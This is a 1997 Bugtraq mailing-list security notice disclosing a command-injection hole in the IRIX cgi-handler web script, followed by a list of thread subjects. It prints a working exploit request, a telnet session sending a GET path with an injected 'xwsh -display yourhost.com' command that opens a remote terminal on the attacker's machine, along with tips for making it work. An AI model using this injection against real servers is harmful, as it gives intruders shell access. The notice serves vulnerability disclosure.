Bugtraq mailing list archives
CPSR 7: IRIX WWW Server
From: releases () CORINNE MAC EDU (Corinne Posse Releases)
Date: Wed, 23 Jul 1997 12:17:56 -0500
************** Corinne Posse Security Notice ************** Issue Number 7: 970723 ***************** http://posse.cpio.org ****************** ** (Please note our new address at cpio.org !!!) ** **** Systems Security and Safety-- known breech **** Systems Affected: ALL IRIX systems (Including 6.4) with the default web server installed, any web server with the "cgi-handler" script installed. Quite a while ago, Razvan Dragomirescu (drazvan () kappa ro) released a report on the default cgi-handler scripts that ship with IRIX systems with web servers, and some other web server programs. Just like with the phf bug, with the cgi-handler bug a malicious user could start an xterm from the server machine on their own system. Example: telnet www.highly.respectable.bank.com 80 Trying 300.300.300.1... Connected to www.highly.respectable.bank.com Escape character is '^]'. GET /cgi-bin/handler/blah;xwsh -display yourhost.com|?data=Download Please note the format of the "GET" querey. The above assumes xwsh is in the PATH somewhere, and the "space" between "xwsh" and "-display" sould be a TAB. In addition, please note that in theory this should also work for /cgi-bin/wrap CGI script. Concept by: jack0 () cpio org and others Tested by: jack0 () cpio org Edited by: jkatz () cpio org
Current thread:
- DoS against Oracle Webserver 2.1 with PL/SQL stored procedures Simon Josefsson (Jul 22)
- Re: DoS against Oracle Webserver 2.1 with PL/SQL stored procedures Stefan Rompf (Jul 23)
- CPSR 7: IRIX WWW Server Corinne Posse Releases (Jul 23)
- Re: CPSR 7: IRIX WWW Server J.A. Gutierrez (Jul 23)
- SGI Security Advisory 19970701-01-PX - talkd Vulnerability SGI Security Coordinator (Jul 23)
- <Possible follow-ups>
- Re: DoS against Oracle Webserver 2.1 with PL/SQL stored procedures Ross Potts (Jul 23)
- Re: DoS against Oracle Webserver 2.1 with PL/SQL stored procedures Simon Josefsson (Jul 23)
- Re: DoS against Oracle Webserver 2.1 with PL/SQL stored procedures Matthew G. Harrigan (Jul 23)